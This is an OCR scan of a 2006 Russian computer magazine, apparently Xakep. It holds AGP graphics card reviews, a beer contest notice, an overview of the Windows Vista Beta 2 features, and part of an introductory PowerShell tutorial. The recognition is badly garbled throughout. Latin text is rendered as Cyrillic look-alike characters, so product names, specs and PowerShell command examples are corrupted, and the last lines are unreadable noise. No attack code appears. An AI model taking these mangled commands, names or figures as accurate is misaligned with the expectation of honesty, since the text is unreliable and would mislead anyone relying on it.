Мощный графический ускоритель пля 
компьютеров с АОР-интеосЬейсом 




В зависимости от твоего 
выбора, модель оснащается 
256 Мб или 512 Мб памяти 
00В2, которая работает на 
частоте 800 МГц. 



НІ8 ХІбООРго ІсеО 256МВ ООВ2 АСР 

Г рафический процессор: ВХІбООРго 

Объем памяти: 256 Мб РРВ2 

Частота ядра: 500 МГц 

Частота памяти: 800 МГц 

Число пиксельных конвейеров: 12 

Число вершинных конвейеров: 5 

Интерфейс памяти: 128 бит 

Цена: $150 
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На видеоадаптер установ- 
лена фирменная система 
охлаждения (ІсеО), благодаря 
которой уровень достигаемо- 
го шума не может быть выше 
20 дБ. 



Комплектуется новинка дву- 
мя дисками, переходником 
ОѴІ-ѴѲА, а также переход- 
ником наВСА. 
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Кроме интерфейса (АОР), 
карта изменений не пре- 
терпела — присутствует 
поддержка ОиаІ І_іпк ОѴІ, а 
также работа с кодеками и 
технология НОВ. 



Карта позволяет играть в сов- 
ременные игры на компьюте- 
рах с устаревшим графичес- 
ким интерфейсом А(ЗР. 




Мощное графическое устройство с воз- 
можностью пеоепоошивки пля повышения 
пооизвопительности 




После перепрошивки при- 
рост производительности 
составил приблизительно 
32% — согласись, нефиго- 
вая цифра! 



РоѵѵегСоІог Касіеоп Х1800СТО 

Графический процессор: (ВХ180СКЗТО) 

Частота процессора: 500 МГц 

Частота видеопамяти: 1000 МГц 

Число пиксельных конвейеров: 12 

Число вершинных конвейеров: 5 

Разрядность шины: 256 бит 

Объем видеопамяти: 256 Мб 

Цена: $280 
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Скорость работы девайса 
позволит тебе гонять в самые 
современные игры. Приятнее 
всего это будет делать, если 
поменять прошивку. 



Сама плата обладает весь- 
ма скромной по толщине 
системой охлаждения и 
готова к работе в режиме 
СгоззРіге. 




Залив прошивкуот Вабеоп 
XI 800ХІ_, ты приятно 
удивишься: 2 пиксельных 
конвейеров превратились 

ВІ6 





Несмотря на скромную 
охлаждающую систему, 
видяшка работает очень 
стабильно и ты не испыта- 
ешь никаких проблем при 
работе с ней. 



Пиво ЕІез и журнал Хакер объявляют конкурс: 




Ты можешь выиграть целых три ящи- 
ка вкусного пива Е^ез и получить 
море позитива, если решишь выпить 
его вместе с нашей редакцией. 

Победить проще простого: сразу после прочтения этого текс- 
та отправляйся к нам в редакцию, и если ты сориентируешься 
в пространстве быстрее всех, то получишь главный пр 
— 1 ,5 ящика пива. 

Остальные полтора ящика разделят поровну второй и 
третий читатели. Адрес редакции и схему проезда лег- 
ко найти на ѵѵѵѵѵѵ.аіс.ги . 

В акции могут участвовать только 
совершеннолетние читатели. 
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Обзор возможностей бета-версии ОС нового п 

ИТАК, СВЕРШИЛОСЬ. НОВОЙ ѴѴІШ0ѴѴ5 ѴІЗТА ОФИЦИАЛЬНО ДОСТУПНА НА САЙТЕ МІСН030РТ. 

А ЗНАЧИТ, ВООРУЖИВШИСЬ СКАЛЬПЕЛЕМ И НЕДЮЖИННЫМ ЖЕЛАНИЕМ, МОЖНО ПРОЩУПАТЬ 
ЭТУ ОПЕРАЦИОНКУ СО ВСЕХ СТОРОН. ЧТО МЫ, СОБСТВЕННО, И СДЕЛАЛИ. ВОТ РЕЗУЛЬТАТ. 




Ты — избранный 

До сегодняшнего дня познакомиться с 
новой ОС могли только самые любопытные 
и терпеливые, которых не испугать поис- 
ком варезных релизов в пиринговых сетях. 
Теперь все иначе. На выставке ѴѴіпНЕС 2006 
которая, между прочим, является одним из 
ведущих событий организуемых МісгозоІІ, 
глава компании лично заявил, что вторая 
бета-версия ѴѴіпбоѵѵз Ѵізіа будет доступна 
для тестирования широкому кругу лиц. И не 
соврал. С 7 июня любой желающий имеет воз- 
можность слить вторую бету Висты (билд 5384 
от 1 6.05.2006) бесплатно. Причем не какую-то 
урезанную версию, а самую что ни на есть 
полную — Шіплаіе ЕбШоп, включающую в себя 
все возможные компоненты будущей ОС. 

Мало того, сразу в двух вариациях: для 32- и 
64-битных платформ. Немного непривычным 
в сравнении с другими релизами М8 может 
показаться размер дистрибутивов: 3,3 Гб и 
4,2 Гб для разных вариаций. Но ведь это же 
ось нового поколения, в которой МісгозоЙ ак- 
кумулирует все свои наработки за последние 
несколько лет. Да и вообще тебя не должно 
это волновать: образ с новой операционкой 
ты найдешь на нашем ЭѴЭ. 

Огласите требования. 

Завладев дистрибутивом, одни сразу ринуть- 
ся в бой, а другие задумаются: «А потянет ли 
моя машина?». Г ейтс сильно преувеличил, 
когда в конце 2003 года рассказал о компью- 
тере нового поколения для новой ОС. Как 
это обычно бывает, погорячились, а потом і 

исправились. Чуть позже были оглашены | 
новые системные требования, которые по ны- ' 
нешним меркам вполне скромные: процессор ѵ 
не меньше 1,1 Гц, 512 Мб оперативной памяти 
и современная видеокарта. На этот раз раз- 
работчики не поленились классифицировать 
максимально возможное разрешение для 
каждого класса видюшек: если у тебя виде- 
окарта с 64 Мб памяти на борту, то большего 
разрешения, чем 1 440x900, ты не увидишь, 





1 28 потянет на 1 920x1 200 и т.д. Впрочем, даже 
эти характеристики указаны с некоторым 
запасом надежности. Например, у меня дома 
Ѵізіа вполне успешно завелась на старень- 
ком 800-м Атлончике с 256 Мб оперативы. Да 
и бесхитростный ОеРогсе2 200МХ потянул 
намного больше, чем обещали разработчики. 
"Для полноценной работы этого, естественно, 
недостаточно, но для экспериментов подходит. 

Трудности перевода 

Как и в предыдущих версиях винды, существу- 
ет два варианта для установки: можно восполь- 
зоваться загрузчиком с ЭѴЭ или же инсталлить 
ось из-под существующей системы. И если 
в последнем случае ничего кардинально не 
I изменилось, то мастер для установки системы 
1\с нуля был переписан подчистую. Теперь это 
уполноценная графическая система с удобным 
Ди понятным интерфейсом и подробными ком- 
ментариями, сопровождающими любой шаг 
пользователя. Вообще, проблемы исключены. 
Единственная сложность — дождаться, пока 
мастер сделает все необходимые действия. 

На современном компе вся процедура едва ли 
займет более получаса. 

^Работа с только что установленной опера- 
ционкой обычно начинается с инсталляции 
необходимых драйверов. Но в случае ѴѴіпбоѵѵз 
Ѵізіа я не устанавливал ни единого драйвера (в 
ХР такого не было). Все завелось и заработало 
на стандартных дровах, причем без каких-либо 
действий с моей стороны. И это несмотря на 
то, что сразу после выхода первых версий 



І_опдИогп’а (прежнего названия будущей ОС) 
по всемирной паутине велись жесткие дис- 
куссии по поводу отвратной совместимости 
ѴѴіпбоѵѵз Ѵізіа с существующим оборудовани- 
ем и программным обеспечением. Мол, после 
установки в диспетчере появляется целый пе- 
речень конфликтующих устройств, а звуковые 
девайсы в ѴѴіпбоѵѵз Ѵізіа вообще отказываются 
работать. Ни за что не поверю, что в дистрибу- 
тиве размером в 3,5 Гб не найдется укромного 
уголка для самых необходимых драйверов, с 
учетом того, что даже в ХР, с ее сравнительно 
смехотворным объемом дистрибутива, поме- 
щалась все, что нужно. Не верь и ты :). 

Что касается программной совместимости, 
то здесь вполне могли возникнуть проблемы. 
Переход на другую ОС, тем более с новым 
ядром, всегда влечет за собой неработос- 
пособность отдельных приложений. И все 
же у меня почти все приложения заработали 
вполне стабильно. Правда, неприятным 
исключением оказалась Мігапба, которая по 
непонятным причинам глючила, но это, похо- 
же, исключительно локальные проблемы на 
моем компьютере. Замечу, что определенные 
конфликты с приложениями могут возникнуть 
в связи с использованием новой графической 
среды Аего, поскольку некоторые программы с 
■ней попросту несовместимы. Но в этом случае 
Ѵізіа автоматически переключит оформле- 
ние на стандартное (с которым не возникнет 
подобных проблем), а затем, когда работа с 
приложением закончится, вернет все настрой- 
ки оформления на свои места. Вообще, по 
нашим наблюдениям, с каждой новой сборкой 
заметно оттачивается стабильность системы. 
Если ранние версии можно было установить 
исключительно ради интереса — поэкспери- 
ментировать и удалить, то вторую бету Ѵізіа 
уже вполне можно использовать в качестве 
основной системы. Что я успешно и делаю на 
протяжении двух последних недель. 

Красиво жить не запретишь 

Если в твоем распоряжении имеется видеокар- 
та с памятью на 1 28 Мб, то тебе будет доступна 
одна из главных инноваций ѴѴіпбоѵѵз Ѵізіа 
— графическая технология Аего ОІазз. Эта 
потрясающая штука предоставляет совершен- 
но новый интерфейс с трехмерными изобра- 
жениями и кардинально новыми возможнос- 
тями визуализации. Без тени сомнения могу 
сказать, что Аего на голову выше обычного 
интерфейса СЮІ+, используемого ранее в 
ХР: многие моменты, ранее препятствующие 
комфортной работе, исправлены. Все реально 
продумано до мелочей. Навигация между 
окнами, например, стала намного проще бла- 
годаря предварительному просмотру окошек, 
появляющихся как при переключении через 
АІІ-ТаЬ, таки при наведении на иконку окна в 
панели задач. Причем в погоне за наворотами 
и впечатляющими эффектами МісгозоІІ заду- 
малась и о стабильности системы. 

В случае нехватки ресурсов из-за большого 
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ММС-консоль для управления файрволом 




количества запущенных приложений ѴѴіпсІоѵѵз 
предложит пользователю на время отключить 
требовательный интерфейс и таким образом 
существенно увеличить общее быстродейс- 
твие Ѵізіа. Пользователю предоставляется три 
альтернативных варианта оформления, унас- 
ледованных у ХР: Ѵізіа Вазіс, Зіапсіагі из 2000 
и старый добрый СІаззіс от 98 винды. А с помо- 
щью новой графический подсистемы Аѵаіоп 
реализованы свободно масштабируемые окна 
стенями, полупрозрачными рамками, а также 
плавными переходами при максимизации или 
минимизации окна. И что самое главное — все 
это работает быстро, без тормозов. 

В лучшую сторону изменилось меню « Пуск» . 
Благодаря специальному полю, позволяющему 
находить нужную программу по части ее на- 
звания, не придется больше бегать по экрану 
глазами и судорожно искать нужное приложе- 
ние. Впрочем, даже обычная навигация стала 
на порядок удобнее за счет использования 
древовидной структуры, аналогичной той, что 
применяется в проводнике. 

Изменился и шелл системы. Если ранее поня- 
тие папки использовалось исключительно как 
контейнер для хранения файлов, то в ѴѴіпсІоѵѵз 
Ѵізіа введено новой понятие — список. В новый 
объект могут виртуально входить ссылки на са- 
мые различные документы, которые реально 
имеют совершенно другое месторасположе- 
ние. Кроме этого, доступен так называемый 
теневой каталог, позволяющий по запросу 
пользователя вернуть его содержание к со- 
стоянию, сохраненному в одной из точек вос- 
становления. Наконец-то в систему встроен 
полноценный инструмент для бэкапа докумен- 
тов и отличный планировщик заданий, которые 




В ѴѴіпсІоѵѵз Ѵізіа доступно множество стилей 
оформления 



вполне успешно можно использовать. Все это 
стало доступно за счет введения символичес- 
ких ссылок и технологии Тгапзасііопаі ІМТРЗ 
— надстройки над существующей файловой 
системой ІМТР5, поддерживающей механизм 
транзакций. Напомню, что транзакция — это 
неделимая последовательность операций, 
которая может завершиться успешно (с вы- 
полнением всех запланированных действий), 
или завершиться полной неудачей (с откатом 
операций, которые завершились успешно). 
Хочу отметить такой элемент интерфейса, 
как ѴѴіпсІоѵѵз ЗібеВаг. Несмотря на то, что в 
последних билдах он по умолчанию отключен, 
о нем знает почти каждая функциональная 
панель. Появившаяся еще в первых билдах 
І_опдИогп, она моментально заинтересовала 
публику и попала во всевозможные статьи. По 
умолчанию панель имеет довольно скромные 
возможности, но это сделано преднамеренно. 
Функциональность серьезно наращивается 
путем добавления/удаления так называемых 
гаджетов — небольших приложений со своими 
настройками и функциями (что-то вроде 
плагинов). Они свободно перемещаются по 
десктопу и могут выполнять самые разно- 
образные функции, например, отображая 
прогноз погоды или качество сетевого 
соединения. Г аджеты представляют собой не 
что иное, как НТМБ-файл, содержащий в себе 
код на ѴВЗсгірІ или иаѵаЗсгірІ. Любой человек, 
владеющий базовыми знаниями этих языков, 
может разработать свой собственный плагин и 
успешно использовать его. 

Мультимедиа 

Окно для настройки клавиатуры претерпело 



значительные изменения. Теперь помимо 
выбора раскладок клавиатуры (расположение 
клавиш, между прочим, можно просмотреть 
в отдельном окошке) можно указать язык для 
голосового ввода теста. Да-да, информацию 
не обязательно вводить вручную — достаточно 
воспользоваться системой распознавания 
речи. Штука поистине потрясающая! После 
небольшого обучающего тура система начнет 
записывать тест под диктовку идеально, а 
если даже и засомневается в каком-то слове, 
то выдает пронумерованный список возмож- 
ных вариантов — от тебя лишь потребуется 
назвать номер правильного слова. Управлять 
системой через микрофон — одно удовольс- 
г^вие. Единственный минус — это отсутствие 
поддержки русского языка. Но ведь в релизе 
этот недостаток исправят. . . 

Порадовала новая панель для управления 
звуком. Наконец-то в винде реализована 
возможность изменения громкости как для 
всей системы, так и для каждого приложения в 
отдельности. А вместо убогой программы для 
записи звука теперь интегрирована полноцен- 
ная утилита, которая, не в пример предшест- 
веннице, может записывать сразу в формат 
ѴѴМА и не ограничивает запись по времени. 
ОігесіХ 10, разработанный специально для 
Ѵізіа, включает в себя столько нового, что 
всей статьи не хватит, чтобы пробежаться по 
этим инновациям. Правда, обещанное в 6 раз 
увеличение производительности мы сможем 
ощутить лишь в приложениях и девайсах, адап- 
тированных под новую версию графического 
АРІ. 



ЧЕГО МЫ НЕ ДОЖДЕМСЯ. 



РЕЛИЗ ѴѴІШОѴѴЗ ѴІЗТА ЗАПЛАНИРОВАН НА 1 ЯНВАРЯ 2007 ГОДА, И В ОСТАВШИЕСЯ МЕСЯЦЫ МІСВОЗОРТ, СКОРЕЕ ВСЕГО, СКОНЦЕНТРИРУЕТ УСИЛИЯ НА ПОИСКЕ 
НЕДОЧЕТОВ И БАГОВ. ЕДВА ЛИ В ФИНАЛЬНОМ РЕЛИЗЕ БУДУТ КАКИЕ-ЛИБО ИЗМЕНЕНИЯ, ПОЭТОМУ МОЖНО СМЕЛО ОГЛАСИТЬ СПИСОК ТЕХ ВЕЩЕЙ, КОТОРЫЕ В 
ѴІЗТ'Е НЕ БУДУТ ВКЛЮЧЕНЫ ПО УМОЛЧАНИЮ, ХОТЯ КОГДА-ТО ОБЕЩАЛИСЬ. 

* ѴѴІІЧРЗ (ѴѴІШОѴѴЗ РІГПІВЕ ЗТОВАОЕ) — НОВЕЙШАЯ СИСТЕМА, ПОСТРОЕННАЯ НА ТЕСНОЙ ИНТЕГРАЦИИ СУЩЕСТВУЮЩЕЙ ЖТ5 И 50І_ 5ЕНѴЕВ 2005. ПОДОБНАЯ 
СВЯЗКА ПОЗВОЛИТ ИСПОЛЬЗОВАТЬ ПОИСКОВЫЕ ЗАПРОСЫ НА ИНТУИТИВНОМ ЯЗЫКЕ, ТИПА «ПОКАЗАТЬ ВСЕ ЭКСПЛОИТЫ ЗА 2006 ГОД, ИСПОЛЬЗУЮЩИЕ ВІІРРЕВ 
ОѴЕВРЬОѴѴ ЕВВОВ», И ПРАКТИЧЕСКИ МГНОВЕННО ПОЛУЧИТЬ ДОСТУП К НУЖНЫМ ФАЙЛАМ. 

* НОВЫЙ КОМАНДНЫЙ ИНТЕРПРЕТАТОР ѴѴІШОѴѴ5 РОѴѴЕВ5НЕІ_І_ (КОДОВОЕ НАЗВАНИЕ — МОІЧАЭ), О КОТОРОМ ТЫ МОЖЕШЬ ПРОЧИТАТЬ В ОТДЕЛЬНОЙ СТАТЬЕ 
ЭТОГО НОМЕРА, ТАКЖЕ НЕ БУДЕТ ВКЛЮЧЕН В СОСТАВ ѴІЗТА ИЗ-ЗА НАКЛАДОК В ХОДЕ РАЗРАБОТКИ. 

* РС-ТО-РС ЗУЫС — ПИРИНГОВАЯ ТЕХНОЛОГИЯ ДЛЯ СИНХРОНИЗАЦИИ КАТАЛОГОВ НА НЕСКОЛЬКИХ МАШИНАХ. УДАЛЕНА ИЗ СИСТЕМЫ, ТАК КАК НЕ ОТВЕЧАЛА 
ТРЕБОВАНИЯМ КАЧЕСТВА. В БУДУЩЕМ ОНА МОЖЕТ БЫТЬ ПРЕДСТАВЛЕНА КАК ОТДЕЛЬНОЕ ПРИЛОЖЕНИЕ. 
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Центр управления сетевыми подключениями 









Сеть 

С сетью у пользователей часто возникают раз- 
личные проблемы. То интернет не работает, 
то браузинг тормозит. Честь и хвала парням 
из МісгозоЙ, которые создали универсальный 
инструмент, готовый решить большинство 
потенциальных проблем обычных пользова- 
телей. Специально разработанный мастер в 
ІМеІѵѵогк Сепіег не только руководит настрой- 
кой сети, но и автоматически пытается настро- 
ить подключения к инету, а также исправить 
некорректные настройки сетевых подключе- 
ний. Для домашних локалок с одним-единс- 
твенным шлюзом в инет — это настоящая ) 
- панацея от всех бед. * 

В сетевом центре всегда отображается схема- 
тическая карта топологии сети с ключевыми 
элементами (компьютер, шлюз, интернет и 
т.д.), а также обозначенными связями между 
ними. Если что-то не работает, то пользователь 
в большинстве случаев наглядно увидит, где 
именно произошла неполадка. Владельцам 
ноутбуков должна приглянуться поддержка 
сетевых профилей, позволяющая для каждой 
локалки обозначить ІР-адрес, ОЫЗ и прокси- 
серверы, а также любые другие настройки, 
после чего быстро переключаться между ними. 
Особое внимание уделено именно беспровод- 
ным подключениям. В настройках даже можно 
указать адрес в формате ІРѵб — это благодаря 
ому, что Ѵіз*а полноценно поддерживает 
следующую версию протокола ІР. 

Не могу не рассказать о новом Іпіегпеі 
Ехріогег’е. Похоже, ребята из М3 наконец- 
то решили сделать из ослика настоящий 
браузер. По крайней мере, результат работы 
налицо: поддержка многовладочного режима, 
встроенный инструмент для чтения РЗЗ-лент, 
блокировщик всплывающих окон и множество 
инструментов для защиты от всевозможной 
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На нашем 0\Ю ты найдешь пол- 
ную 32-битную версию ѴѴіпбоѵѵз 
Ѵізіа Веіа 2 



У новой операционной системы, в 
отличие от ѴѴіпбоѵѵз ХР, будет не 
две, а сразу несколько комплек- 
таций. Самая простая — ѴѴіпбоѵѵз 
Ѵізіа Ноте Вазіс — будет стоить 
порядка 1 000 рублей. 



В переводе на русский язык ѵізіа 
означает «новые возможности», 
«открывающиеся перспективы». 
Парни из маркетингового отдела 
с названием ОС не прогадали: оно 
получилось звучным и запомина- 
ющимся. 



Безопасность 

Безопасность и надежность обещают стать 
двумя важнейшими характеристиками Висты. 
Действительно, парни из М3 приложили массу 
усилий, чтобы новая ось стала крепкой и здо- 
ровой. Например, сразу после установки учет- 
ные записи пользователей ограничиваются 
в использовании Іпіегпеі Ехіогег. Полномочий 
хватает на просмотр исключительно веб- 
страничек. А сам ІЕ запускается отдельным 
процессом с низкими привилегиями, тем са- 
мым ограждая пользователя от вредоносного 
контента и уявимостей , в том числе и АсііѵеХ- 
Чомпонентов. Все попытки провести атаку 
■через ІЕ закончатся неудачами, поскольку 
сам браузер будет обладать минимальными 
правами в системе. 

Разработчики реализовали «человеческий» 
брандмауэр с фильтрованием как входящего, 
так и исходящего трафика. Консоль ММС, 
через которую реализовано управление файр- 
волом, предоставляет намного больше воз- 
можностей и, что особенно радует, позволяет 
задать исключения для каждого отдельного 
пользователя и профили с настройками для 
разных сетей. 

Еще одной функцией для обеспечения 
безопасности системы является технология 
ѴѴіпбоѵѵз Зегѵісе Нагбепіпд (повышение стой- 
кости служб), которая предотвращает попытки 
сервисов несанкционированно выполнять 
операции с файловой системой, реестром 
и сетевыми настройками. Каждому сервису 
отныне присваивается идентификатор безо- 
пасности (Зесигііу ібепііііег, ЗЮ), с помощью 
которого возможно не только разграничить 
внешний доступ самой службы, но и саму ее 
оградить от внешнего воздействия. Более 
того, большинство служб теперь запускаются 
не с системными привилегиями, а с помощью 
менее привилегированных аккаунтов. 



Для защиты конфиденциальной информации 
в Ѵізіа встроена технология ВіЩоскег Эгіѵе 
Епсгурііоп, предназначенная для шифрования 
данных на системном разделе. Систему реко- 
мендуется использовать совместно со специ- 
альным чипом Тгизіеб РІаіІогт Мобиіе (ТРМ), в 
котором хранятся ключи для дешифрования 
информации. Однако возможна также аутенти- 
фикация с помощью пароля или файла-ключа, 
расположенного на ІбЗВ-флешке. 
Всевозможные виды атак и, в первую очередь, 
переполнение буфера осуществить в Ѵізіа 
станет намного сложнее из-за технологии 
случайного размещения кода в адресном 
пространстве (АЗІ_В, Аббгезз Зрасе І_ауоиІ 
Вапботігаііоп). Каждый раз при включении 
компьютера системой будут случайным обра- 
зом меняться адреса начальных ячеек памяти 
с наиболее часто используемыми системными 
библиотеками. И если раньше разработанный 
для винды эксплоит отлично работал в ана- 
логичной системе на другом компьютере, то 
технология АЗІ_В эту возможность значитель- 
но затруднила. Подобный принцип уже давно 
реализован в системе ОрепВЗО. 

Резюмирую. Хакерам, похоже, придется 
изрядно поломать голову, чтобы обойти все 
защитные уловки системы. Инжектировать 
и выполнять произвольный код будет уже не 
такой простой задачей, как раньше. 

І-одоиі 

Само собой, в рамках одной статьи невозмож- 
но рассказать о том огромном количестве но- 
вовведений, которые представлены в ѴѴіпбоѵѵз 
Ѵізіа. Но мы попытались дать обзор самых 
сочных фишек, которые реально пригодятся 
тебе в деле. В любом случае, ты имеешь отлич- 
ную возможность протестировать новую ось 
и определиться с тем, что тебе действительно 
нужно, з= 



НОВЫЕ КОНСОЛЬНЫЕ УТИЛИТЫ 



МКШК — СОЗДАЕТ, МОДИФИЦИРУЕТ И УДАЛЯЕТ СИМВОЛИЧЕСКИЕ ССЫЛКИ. ДА-ДА, ТЕПЕРЬ ОБРАЩАТЬСЯ К ФАЙЛАМ И ДИРЕКТОРИЯМ МОЖНО НЕ ТОЛЬКО 
НАПРЯМУЮ, НО И С ПОМОЩЬЮ ВИРТУАЛЬНЫХ ССЫЛОК. ПОЛНЫЙ АНАЛОГ СИМЛИНКОВ ИЗ ЮНИКСА.. 

ВСОЕОІТ — ПРОГА ДЛЯ УПРАВЛЕНИЯ ЗАГРУЗЧИКОМ (КОНФИГУРАЦИОННЫЙ ФАЙЛ ВООТ.ІМ, В КОТОРОМ РАНЬШЕ РАСПОЛАГАЛИСЬ ПАРАМЕТРЫ ЗАГРУЗЧИКА, 
БОЛЬШЕ НЕ ИСПОЛЬЗУЕТСЯ). 

РЮВОСОРѴ — РАСШИРЕННАЯ УТИЛИТА ДЛЯ КОПИРОВАНИЯ ФАЙЛОВ И ДИРЕКТОРИЙ. 

ТРАЫЗАСТЮМ — КОМАНДА ДЛЯ ИСПОЛЬЗОВАНИЯ ВОЗМОЖНОСТЕЙ ТВА№АСТЮМАІ_ ІЧТРЗ. 
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ЖАЛКО Е ЗРЕЛИ ЩЕ ПРЕДСТАВЛЯЕТ ЭТА КОМАН ДНАЯ СТРО КА 
В ѴтЮОѴѴЗІДАЖЕ ПРИ БОЛЬШОМ ЖЕЛАНИИ СДЕЛАТЬ_ЧТО-ІО 
ТОЛКОВОЕ В НЕЙ СЛОЖНО. 



Остается только возмущаться: «Мол, что за недоделка такая, пережитки досовских времен!» Не в пример стсі.ехе. 
юниксовые оболочки позволяют комфортно чувствовать себя в консоли и автоматизировать рутинные действия любой 
сложности. МісгозоІТ конечно, понимает шаткость своего положения, поэтому с перепугу опубликовала бета-версию 
своего нового командного шелла. Штука получилась знатная! 




040 



Могучий шелл 



ИЗУЧАЕМ НОВУЮ ПЕРСПЕКТИВНУЮ РАЗРАБОТКУ ОТ МІСВОЗОВТ 



Экскурс в историю 



Графический интерфейс в винде — стандарт де-факто. Консольные 
версии утилит, вообще говоря, большая редкость, и не популярны среди 
пользователей. В никсах же все с точностью до наоборот — большинс- 
тво приложений работают из командной строки, для которых нередко 
создаются надстраиваемые графические интерфейсы (ІгопІепсГы). Но 
опытный админ ловко оперирует консольными командами и может со- 
вершенно спокойно работать только в консоли. Преимущества подоб- 
ного подхода налицо. 

Гейтс уже задумывался о том, что командный интерпретатор нужно ме- 
нять. Еще в 1 998-м году он дал добро на выпуск ѴѴіпбоѵѵз Зсгірі НозГ ѴѴЗН 
существовал как надстройка над ѴѴіп98, но не был полностью интегриро- 
ван с командной строкой, потому и провалился. И это несмотря нато, что 
исполняемые сценарии можно было писать на ЗЗсгірІ, ѴВЗсгірІ и других 
языках, например РегІ, которые пользователь мог прикрутить самосто- 
ятельно. В системе нашлось немало бажных мест, которые быстро при- 
способили в своих целях вирусы и, по сути, окончательно похоронили 
благое начинание МісгозоЙ. 

Как говорят, первый блин комом. Следующая попытка МісгозоГ обе- 
щает стать куда более удачной или, вернее сказать, уже таковой ста- 
ла. В сентябре прошлого года компания анонсировала бета-версию 
новой командной оболочки с кодовым названием МопасІ. Разработка 
позволяла пользователю выполнять любые действия из командной 
строки, используя удобный и интуитивно понятный синтаксис языка 
высокого уровня. Со временем за разработкой закрепилось название 
РоѵѵегЗИеІІ. 



Устройство РоѵѵегЭНеІІ 



Чтобы на пальцах не объяснять прелести нового шелла, мы сразу присту- 
пим к практике. Такие вещи лучше всего объяснять на примерах. А чтобы 
добиться максимального результата, я рекомендую экспериментиро- 
вать с командами прямо во время чтения статьи. Такты лучше поймешь, о 
чем идет речь, и в дальнейшем будешь лучше ориентироваться среди ко- 
манд и конструкций РоѵѵегЗГіеІІ. Правда, перед началом экспериментов 
шелл придется установить. Дистрибутив можно закачать с сайта ѵѵѵѵѵѵ. 
тісгозоГ.сот . предварительно пройдя простую регистрацию, или же в 
готовом виде взять с нашего диска. Еще потребуется заинсталлить .ІЧеІ 
Ргатеѵѵогк второй версии, но, скорее всего, он у тебя уже установлен. 
Сразу предупреждаю: синтаксис РоѵѵегЗГіеІІ довольно специфичен и за- 
метно отличается от юниксовых (ЬазГ’а или гзГ). Сначала он даже может 
показаться сложным, но это только первое впечатление. Г лавная отличи- 
тельная особенность шелла — это специфическая обработка вводимой 
информации. Если ЬазГ обрабатывает любое выражение как команду, 
то в РоѵѵегЗГіеІІ используется совершенно другой подход. Он пытается 
вычислить выражение. То есть если в командной строке ЬазГ набрать 
«5+3» , то оболочка выдаст сообщение о том, что команда не найдена. А 
новая разработка от МісгозоЙ вычислит выражение и выдаст результат 
на экран. Например: 

РЗ СЛОоситепІз апсі ЗеШпдз\5і> "Іезі" 

Іезі 

РЗ С:\Ооситеп1з апсі ЗеШпдз\зі> 5+3*2 
11 

Проще говоря, РоѵѵегЗГіеІІ работает с данными, которые вводятся в ко- 
мандную строку, как с переменными. Ими даже можно манипулировать с 
помощью разных методов. Смотри, к примеру, на результат метода зрііі: 

РЗ ОЛОоситепІз апсі ЗеШпдз\зпаке> "зііиі ир та 2 аІака".зрІіІ(" "); 

зііиі 

ир 

тагаіака 

Строка разбилась на части по пробелу. Попробуй метод зиЬз!гіпд(іп1: 
Іпбехзіагі) — выведется часть строчки, начиная с іпбехзіагі. 

С другой стороны, любые команды и запуск исполняемых файлов осу- 



ществляются как есть: главное — не писать их в кавычках. Очень просто 
объявляются и переменные. Для этого используется стандартный опера- 
тор присвоения — «=». Зададим, например, массив и хэш значений: 

РЗ СЛОоситепІз апсі ЗеШпдз\зі> $таззіѵ=@(1 ,2, 3,4, 5) 

РЗ СЛОоситепІз апсі ЗеШпдз\зі> $Ііа5Іі=@{кеуО="ѵаІиеО"; кеу1="ѵаІие1"; 
кеу2="ѵаІие2"} 

А теперь выведем второй элемент каждого из них (замечу, что нуме- 
рация индексов начинается с нуля): 

РЗ СЛОоситепІз апсі ЗеШпдз\зі> $таз5іѵ[1] 

2 

РЗ С:\Ооситеп1з апсі ЗеШпдз\зі> $ІіазІі["кеу1 "] 
ѵаіиеі 

Теперь поговорим о другом важном отличие РоѵѵегЗГіеІІ . В никсах каждая 
утилита имеет разное количество аргументов и парсит переданные ей 
данные по-своему. То же самое касается и вывода данных. В тзГ коман- 
ды называются Соттапб Іеіз (сокращенно — стбіеі'ами) и наследуют- 
ся от одного базового класса. Отсюда все вытекающие последствия: 
данные они парсят одинаково, обладают схожими методами и на выходе 
подают данные в структурированном виде. Все командлеты — это на- 
именьший модуль функциональности системы, своеобразный аналог 
встроенных команд в других оболочках. Стбіеі обозначается парой 
«глагол-оболочка», поэтому всегда имеет очень простое и запоминаю- 
щееся имя. Например, список запущенных процессов и информацию о 
них можно получить, набрав в консоли команду Ѳеі-Ргосезз: 

РЗ СЛОоситепІз апсі ЗеШпдз\5і> Ое+Ргосезз 

НапсІІез ЫРМ(К) РМ(К) ѴѴЗ(К) ѴМ(М) СРУ(5) ІсІ РгосеззЫате 



105 


5 1216 


3580 


32 


0,06 


2940 аід 


16 


1 1388 


1152 


13 


0,02 


1284 стсі 


581 


7 1852 


5256 


28 


60,72 


896 С5Г55 



[■■] 

По умолчанию в поставке нового шелла идет примерно 130 встроенных 
стбіеі’ов. Ихсписокможно получить с помощью командлетадеі-соттапбз, а 
справку по каждому из них — с помощью деМлеІр <название_командлета>. 
Для удобства использования многие команды можно вызвать так, как 
если бы ты работал в юниксе. Саі покажет содержимое файла, Із выведет 
список файлов и папок в текущей директории, а Гіізіогу освежит память 
пользователя, выдав последние набранные команды. Хотя в РоѵѵегЗГіеІІ 
для этого используется Оеі-Сопіепі, ОеІ-СГііІсІІІет, Оеі-Нізіогу. Все это 
осуществляется на базе специальных псевдонимов (алиасов). Узнать 
соответствия псевдонимов настоящим командам можно, набрав в кон- 
соли команду аііаз. 



Псевдонимы и сценарии 



Интерпретатор поддерживает С#-подобный скриптовый язык, который 
использует такие возможности шарпа, как циклы (Іог,ѵѵГііІе,ІогеасГі), 
условия (іі,5ѵѵіісГі), определение своих собственных пользовательских 
функций и ограничение видимости переменных (дІоЬаІ/зсгірІ/ІосаІ/ 
ргіѵаіе). Кроме того, можно использовать регулярные выражения, 
например, в сазе-блоках оператора зѵѵіісГі: 

зѵѵіісіі -гедех ($ѵаг) 

{ 

".*[0-9]+" { "строка заканчивается числом!" } 
сіеіаиіі { "строка не заканчивается числом!" } 

} 

Ясно, что все управляющие конструкции языка программирования 
высокого уровня и более сотни команд на все случаи жизни позволя- 
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^□ру ь-іц ІкЕ <С> 2ВШ Нісь^^йІЧ Со ігііо ѵ-л Е іп п - Й 11 і^іуІьЕз !■« в г-ѵе-4 



Рп эръ и *-г*ѵпк Іч? пип ^ о Г 1 м* г-г і" топ (Ні* ипЪгУыІѵгі ртЪІ 5 сімі г 1 ? 

I Зье Г і 1 -е- В * Ч РУ о || г-АН Р і 1 ^ аЧІІ і п ііаи-э ІѴнлі г-й Ііе ІІЧиІ _&\± у уса. _ р=і І >:гі I і:; іні Ы іа кье-ск Ьѵ 
